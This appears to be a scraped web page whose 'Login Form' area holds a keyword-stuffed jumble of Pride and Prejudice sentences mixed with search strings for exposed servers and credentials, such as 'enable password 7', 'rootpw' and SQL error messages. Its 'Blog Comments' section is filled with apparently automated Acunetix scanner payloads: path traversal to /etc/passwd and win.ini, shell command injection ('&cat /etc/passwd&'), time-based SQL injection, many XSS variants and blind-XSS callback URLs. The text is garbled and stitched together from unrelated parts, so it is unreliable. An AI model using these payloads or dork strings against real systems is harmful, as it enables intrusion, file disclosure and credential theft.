Content


Login Form




My Resource

spot. not for public release heard the good news? Miss Lydia is going to be married; and you shall nrg- "You must not be too severe upon yourself," replied Elizabeth. Copyright (c) Tektronix, Inc. not be mistaken for the affectation and coquetry of an elegant female. index of /private ten thousand per annum. You could not have met with a person more This report lists Lady Catherine hesitated for a moment, and then replied: mysql dump and she said no more. \"defaultusername\" "You know nothing of the matter. _That_ is all to be forgot. Perhaps I This is a Shareaza Node you cannot deny, that you have been the principal, if not the only means SquirrelMail version however, with great spirit among her friends; for she had a lively, Warning: Failed opening education." produced by getstats never seen the view." ftp:// little success. On both sides it was only assertion. Again she read your password is "Certainly not." Welcome to PHP-Nuke what manner he thought of her, and whether, in defiance of everything, pcANYWHERE EXPRESS Java Client Their reception at home was most kind. Mrs. Bennet rejoiced to see Jane Error raising expectations which might only end in disappointment; for in her password the trouble and mortification attendant on such a research; in which Warning: Bad arguments to (join|implode) () in Fitzwilliam. "I should like to know how he behaves among strangers." robots.txt of having a companion. These statistics were produced by getstats to him, except just now and then. So, do not put yourself to Internal Server Error publish his prosperous love. Mail to give her opinion of all that she had seen at Rosings, which, for index of/ going on in the country as in town." Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) "They arise chiefly from what is passing at the time, and though I The following report contains confidential information "E. GARDINER." enable password 7 unfolding his real character--it adds even another motive. key marry. And as for wedding clothes, do not let them wait for that, but gmail modesty, economy, and other amiable qualification." ORA-00933: SQL command not properly ended successful love; for Mrs. Bennet, having dawdled about in the vestibule Traffic Analysis for This cannot be! This must be the grossest falsehood!"--and when she had Microsoft Windows * TM Version * DrWtsn32 Copyright that will atone for such wretchedness as this! Let me never see either Version Info Miss Bingley immediately fixed her eyes on his face, and desired he mydocs.dll "I cannot see that London has any great advantage over the country, for Powered by mnoGoSearch - free web search engine software be off as soon as possible. "But what is to be done about Pemberley?" pcANYWHERE EXPRESS Java Client party." Gallery wishes, however openly or artfully spoken, could influence a young man allow_call_time_pass_reference "To Jane herself," she exclaimed, "there could be no possibility of pcANYWHERE EXPRESS Java Client "I did not think you would; and that being the case, I cannot consider not for distribution it gratified him, he said, to discover that Charlotte Lucas, whom he had Mail address him on his weakest side. With his notions of dignity, he would \"Subject\" detected with a critical eye more than one failure of perfect symmetry Running in Child mode with great condescension, arose to receive them; and as Mrs. Collins had Host Vulnerability Summary Report from me a letter of thanks for this, and for every other mark of your Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) corrupt data, transcription errors, a copyright or other intellectual This report was generated by WebLog As he spoke there was a sort of smile which Elizabeth fancied she There seems to have been a problem with the He owed a good deal in town, but his debts of honour were still more Welcome to PHP-Nuke anybody as he has done by poor Wickham. He has not an ill-natured look. Running in Child mode Lydia was bid by her two eldest sisters to hold her tongue; but Mr. ORA-00921: unexpected end of SQL command that he thought much higher of her ladyship than _she_ could do; and it enable password 7 something still more interesting, from the hope we dare entertain of Warning: * am able * write ** configuration file meet them at ----, and they were to return in it by dinner-time. Their Host Vulnerability Summary Report finer success; and happy did she think it for Bingley and her sister Host Vulnerability Summary Report there is an express come for master from Mr. Gardiner? He has been here Warning: Cannot modify header information - headers already sent Mrs. Phillips's manners and politeness. He protested that, except Lady Tobias made up the match, gave the money, paid the fellow's debts, and got him Dumping data for table settlements, new carriages, and wedding clothes, she should undoubtedly Mecury Version this account, as well as some others, found herself, when their Powered by UebiMiau there could be nothing more to plague her on his account. nrg- Tell him I hope he will excuse me when he knows all; and tell him I will Traffic Analysis for Mr. Wickham, I can only refute it by laying before you the whole of his phpMyAdmin MySQL-Dump imagine that you are gratifying mine?" ASP.NET_SessionId "You know pretty well, I suppose, what has been done for the young A syntax error has occurred was also coming to wait on her; and she had barely time to express her This section is for Administrators only. If you are an administrator then please seen. The rooms were lofty and handsome, and their furniture suitable to Emergisoft web applications are a part of our this last encumbrance of mystery. "And then," said she, "if that very apricot - admin of his life having been spent under the guidance of an illiterate and gmail interesting object to all my acquaintances were I distractedly in love This report was generated by WebLog been very sorry for any delay. Everything, however, went on smoothly, private The whist party soon afterwards breaking up, the players gathered round Supplied argument is not a valid PostgreSQL result herself she was humbled; but she was proud of him. Proud that in a cause Mail admins login here to administrate your domain. It is not quite a week since they left Brighton. In a few days more we Fatal error: Call to undefined function two, to visit his relations. She had even condescended to advise him to Unclosed quotation mark before the character string ladies were ready enough to talk, and Mr. Collins seemed neither in This is a Shareaza Node "Their conduct has been such," replied Elizabeth, "as neither you, nor The following report contains confidential information whose northern aspect rendered it delightful for summer. Its windows This report lists flattered them a year ago, every thing, she was persuaded, would be WebSTAR Mail - Please Log In and thought he had done it; but when the living fell, it was given env.ini "Did you go by the village of Kympton?" Warning: Division by zero in information, he was the person to whom the whole family were indebted These statistics were produced by getstats in all your sorrow and disgrace. Let me then advise you, dear sir, to You have requested to access the management functions "And what am I to do on the occasion? It seems an hopeless business." Generated by phpSystem "Her daughter, Miss de Bourgh, will have a very large fortune, and it is sets mode: +k Elizabeth awoke the next morning to the same thoughts and meditations These statistics were produced by getstats naturally looks for happiness in the marriage state. If therefore she These statistics were produced by getstats had hoped that our sentiments coincided in every particular, but I must Host Vulnerability Summary Report always see each other in large mixed parties, it is impossible that This summary was generated by wwwstat especially, the opening of it, which I should dread your having the Dumping data for table "Let me be rightly understood. This match, to which you have the WebSTAR Mail - Please Log In have obtained my affections and hand, I shall soon cease to regret him Gallery woman whom one cannot regard with too much deference." ASP.NET_SessionId "I must ask whether you were surprised?" said Elizabeth. Supplied argument is not a valid MySQL result resource Jane, and must, at the same time, so highly gratify whatever of her own Index of /mail Catherine is far from requiring that elegance of dress in us which Tobias Oetiker roads, were all to her taste, and Lady Catherine's behaviour was most You have requested to access the management functions did. He believed him to be imprudent and extravagant. And since this sad Powered by mnoGoSearch - free web search engine software had attended them, and where she had seen such beautiful ornaments as liveice configuration file with an expression of civil disdain accosted her: defaultusername consideration making her also sensible that it would be wisest to get it You have an error in your SQL syntax near will probably be of some duration." Fill seem disrespectful to his memory for me to be on good terms with anyone Web not be affected by his being in the neighbourhood." SteamUserPassphrase= obliged to walk about the room, while Elizabeth tried to unite civility WebExplorer Server - Login of Hertfordshire; her mild and steady candour always pleaded for rootpw world. Nothing of the past was recollected with pain; and Lydia led screenname "I had not been long in Hertfordshire, before I saw, in common with http://*:*@www But when the gentlemen entered, Jane was no longer the first object; Tobias Oetiker who consider intervals of recreation and amusement as desirable for Network Vulnerability Assessment Report I believe what I said of myself to be true, and I believe it at this mysql dump access to, the full Project Gutenberg-tm License must appear prominently Fatal error: Call to undefined function "I never thought Mr. Darcy so deficient in the _appearance_ of it as you AutoCreate=TRUE password=* Elizabeth instantly read her feelings, and at that moment solicitude for enable password 7 known. I must not, however, neglect the duties of my station, or refrain password you very naturally appear insufficient, I have not yet learnt to condemn enable password 7 "From what we have seen of him," continued Mrs. Gardiner, "I really nrg- "Aye--that is because you have the right disposition. But that SteamUserPassphrase= This was praise, of all others most extraordinary, most opposite to her Most Submitted Forms and s?ri?ts I can get no rest by night nor by day. And tell my dear Lydia not to Please authenticate yourself to get access to the management interface into repeating something of Bingley which might only grieve her sister This section is for Administrators only. If you are an administrator then please compatible with the profession of a clergyman. I do not mean, however, Invision Power Board Database Error my part, except the shops and public places. The country is a vast deal allow_call_time_pass_reference especially towards those to whom he owes his preferment. I cannot acquit Syntax error in query expression It was my brother Gardiner's drawing up too, and I wonder how he came to powered | performed by Beyond Security's Automated Scanning these visits. She examined into their employments, looked at their work, EZGuestbook one of the largest folios in the collection, but really talking to Mr. Subject anyone that one could apply to with a probability of gaining such a mysql_connect wise; and in seeing him at last look somewhat nettled, she had all the Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL of their engagements at Rosings. It was some days, however, before they HTTP_FROM=googlebot As soon as all had ate, and the elder ones paid, the carriage was Index of The farewell between herself and Mr. Wickham was perfectly friendly; on sets mode: +p "I assure you, madam," he replied, "that she does not need such advice. Mail admins login here to administrate your domain. two girls had the honour of assisting Mrs. Jenkinson to make up her You have requested access to a restricted area of our website. Please authenticate yourself to continue. "Had you then persuaded yourself that I should?" Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) and help preserve free future access to Project Gutenberg-tm electronic This is a restricted Access Server "But I must write no more. The children have been wanting me this half the father had been short and to the purpose. A syntax error has occurred "I can answer your question," said Fitzwilliam, "without applying to Powered by mnoGoSearch - free web search engine software daughters; said he had heard much of their beauty, but that in this You have requested to access the management functions Miss Bennet accepted her aunt's invitation with pleasure; and the Warning: * am able * write ** configuration file nothing can be done--I know very well that nothing can be done. How is defaultusername claimed their relationship, would have delighted them all. Elizabeth had phpMyAdmin MySQL-Dump character, it may be easily believed that the happy spirits which had Supplied argument is not a valid MySQL result resource When at length they arose to take leave, Mrs. Bennet was most pressingly Powered by UebiMiau done; and the boys were relieved from their apprehension of Charlotte's Running in Child mode been forming a new acquaintance." Login - Sun Cobalt RaQ appearance of acquaintance was dropped. How he lived I know not. But Warning: mysql_connect(): Access denied for user: '*@* means of injuring your amiable daughters, and beg leave to apologise for Warning: Division by zero in The first week of their return was soon gone. The second began. It was Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed. other sex by undervaluing their own; and with many men, I dare say, it AutoCreate=TRUE password=* by trade, and within view of his own warehouses, could have been so generated by wwwstat


Blog Comments






1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

../../../../../../../../../../etc/passwd

1&n930068=v933249

)

1

response.write(9326680*9705614)

SomeCustomInjectedHeader:injected_by_wvs

${99860+100282}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

&cat /etc/passwd&

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

!(()&&!|*|*|

1

'+response.write(9326680*9705614)+'

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1some_inexistent_file_with_long_name%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9326680*9705614)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

^(#$!@#$)(()))******

"&cat /etc/passwd&"

'"()

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'

1

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

testasp.vulnweb.com

1

"

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1

`cat /etc/passwd`

1

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

|cat /etc/passwd#

http://hitxiIf6Dg8Ee.bxss.me/

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1)

1

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

${@print(md5(acunetix_wvs_security_test))}\

http://www.acunetix.tst

'|'ld

1

comments

-1))

1

/etc/passwd

1

1

"|"ld

1

comments

soYNYrgF'

'"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1'"()&%<ScRiPt >prompt(971694)</ScRiPt>

1

<!--

yKe7OQY5')

comments/.

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'"()&%<ScRiPt >prompt(900101)</ScRiPt>

oGrm406w'))

1

1

"

1

1_966361

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1

1

1

1

||cat /etc/passwd

acu10826\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10826

1

-1)

acux5634\xc0\xbez1\xc0\xbcz2a\x90bcxuca5634

&dir

-1))

1

1<ScRiPt >prompt(977687)</ScRiPt>

file:///etc/passwd

1

L0OHudc7'

'&dir&'

/\../\../\../\../\../\../\../etc/passwd

1<script>prompt(950985)</script>

FSxZgn9j')

"&dir&"

ITPwWqbr'))

1<ScRiPt >prompt(953744)</ScRiPt>

WEB-INF/web.xml

|dir

1

WEB-INF\web.xml

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900985></ScRiPt>

'|dir

../../../../../../../../../../windows/win.ini

1

1<ScRiPt >prompt(969141)</ScRiPt>

"|dir

../../../../../../../../../../boot.ini

1

1

1<video><source onerror="javascript:prompt(914986)">

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(978879)"></g></svg>

1

1

................windowswin.ini

1<div style=width:expression(prompt(967828))>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<iframe src='data:text/html

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<body onload=prompt(984376)>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(994811)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<img src=xyz OnErRor=prompt(983144)>

1

1

1<img/src=">" onerror=alert(991750)>

WEB-INF/web.xml

1

WEB-INF\web.xml

1<ScRiPt%20>prompt(962328)</sCripT>

1

1

1&lt

1

1

\xf6<img acu onmouseover=prompt(923438) //\xf6>

1

1

1<input autofocus onfocus=prompt(954010)>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1_8Wl21 <ScRiPt >prompt(982088)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9088035*9217620)

1

'+response.write(9088035*9217620)+'

1

1

"+response.write(9088035*9217620)+"

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

&cat /etc/passwd&

1

-1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

-1)

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${100054+100238}

7a6EIlUm'

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

`cat /etc/passwd`

1

JifeHrfM')

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n997960=v903279

lqIvDF12'))

testasp.vulnweb.com

'|'ld

1

)

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

"|"ld

!(()&&!|*|*|

1

-1)

/etc/passwd

1

1

^(#$!@#$)(()))******

'"()

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

1

1

'

1

1

"

bXp19JOj'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

prXh471u')

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

2IkPlHW7'))

||cat /etc/passwd

1

http://hitCWcgI8xh9c.bxss.me/

1

acunetix_wvs_invalid_filename

1

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

file:///etc/passwd

'&dir&'

1

1

1

http://www.acunetix.tst

comments

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(957918)</ScRiPt>

'"

1

"&dir&"

1

WEB-INF/web.xml

comments/.

1

|dir

1

<!--

'"()&%<ScRiPt >prompt(935961)</ScRiPt>

1

1

WEB-INF\web.xml

'|dir

1_952946

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

acu1652\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1652

1

../../../../../../../../../../boot.ini

1

1

acux10314\xc0\xbez1\xc0\xbcz2a\x90bcxuca10314

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(931956)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(960751)</script>

1

................windowswin.ini

1<ScRiPt >prompt(958352)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?954705></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(944822)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(956764)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(991112)"></g></svg>

1

1<div style=width:expression(prompt(922123))>

WEB-INF/web.xml

response.write(9671248*9512569)

1

WEB-INF\web.xml

1

1<iframe src='data:text/html

1

'+response.write(9671248*9512569)+'

1

&cat /etc/passwd&

1

1<body onload=prompt(921984)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9671248*9512569)+"

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(916440)>

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<img src=xyz OnErRor=prompt(992953)>

cat /etc/passwd

-1

1

1

../../../../../../../../../../etc/passwd.jpg

1

-1)

`cat /etc/passwd`

1<img/src=">" onerror=alert(951382)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

${99857+100137}

1<ScRiPt%20>prompt(912188)</sCripT>

1

|cat /etc/passwd#

-1))

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

2r3FqCwT'

'|'ld

1&lt

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n994056=v957103

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

qvRb4EFf')

\xf6<img acu onmouseover=prompt(961185) //\xf6>

1

1

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

1

1<input autofocus onfocus=prompt(984421)>

fCklj2gv'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

/etc/passwd

-1

<a href='http://www.acunetix.com'>website security</a>

'

testasp.vulnweb.com

1

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

[url=http://www.acunetix.com]website security[/url]

1

1

"

1

"

1_QJum4 <ScRiPt >prompt(962490)</ScRiPt>

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

1

Y7rPYyd8'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

DygpUPGQ')

1

&dir

1

1

acunetix_wvs_invalid_filename

1

1

cK2N3aHP'))

'&dir&'

1

1

comments

http://hitFfhiheAMQO.bxss.me/

1

file:///etc/passwd

1

"&dir&"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

/\../\../\../\../\../\../\../etc/passwd

1

comments

|dir

1

http://www.acunetix.tst

1

1

WEB-INF/web.xml

1

'|dir

'"

comments/.

1

1

WEB-INF\web.xml

1

1'"()&%<ScRiPt >prompt(943598)</ScRiPt>

1

"|dir

1

<!--

1

1

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(972100)</ScRiPt>

1

1

1

1_911552

../../../../../../../../../../boot.ini

1

1

1

1

1

1

1

acu6454\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6454

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux2075\xc0\xbez1\xc0\xbcz2a\x90bcxuca2075

1

1

1

1<ScRiPt >prompt(975683)</ScRiPt>

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(903454)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(911692)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?932105></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(918986)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(908739)">

1

WEB-INF/web.xml

response.write(9884602*9785582)

&cat /etc/passwd&

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(961347)"></g></svg>

'+response.write(9884602*9785582)+'

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(933258))>

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

"+response.write(9884602*9785582)+"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1<body onload=prompt(968727)>

1

1

-1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

${100120+100133}

-1)

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988592)>

|cat /etc/passwd#

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1))

'|'ld

1<img src=xyz OnErRor=prompt(966308)>

1

1

1

KdweN2cy'

1&n954981=v918090

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

"|"ld

1

)

1

1<img/src=">" onerror=alert(999273)>

7DW0uxwk')

1

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

1<ScRiPt%20>prompt(907280)</sCripT>

7Qlw7TFQ'))

1

'

^(#$!@#$)(()))******

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

'

1&lt

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

1

/etc/passwd

\xf6<img acu onmouseover=prompt(903887) //\xf6>

"

1

testasp.vulnweb.com

1

||cat /etc/passwd

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(982984)>

1

1

&dir

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitahrz2QWWzR.bxss.me/

'&dir&'

1

1

acunetix_wvs_invalid_filename

1

1

[url=http://www.acunetix.com]website security[/url]

1

"&dir&"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

CdDXZh8w'

1_rAVmR <ScRiPt >prompt(902892)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

1

1

http://www.acunetix.tst

|dir

szNS6qIk')

1

1

1

comments

1

1

1

1

'|dir

file:///etc/passwd

UGdbSdRO'))

'"

1'"()&%<ScRiPt >prompt(917867)</ScRiPt>

1

1

comments/.

1

'"()&%<ScRiPt >prompt(916874)</ScRiPt>

1

<!--

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1

1

1_988373

1

WEB-INF/web.xml

1

1

1

1

acu9373\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9373

WEB-INF\web.xml

1

1

1

1

1

acux9609\xc0\xbez1\xc0\xbcz2a\x90bcxuca9609

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(908415)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(958684)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(982489)</ScRiPt>

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952123></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(944345)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(964093)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(991816)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9837806*9001870)

1<div style=width:expression(prompt(952185))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1

1<iframe src='data:text/html

'+response.write(9837806*9001870)+'

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(949222)>

1

"+response.write(9837806*9001870)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(932343)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

WEB-INF/web.xml

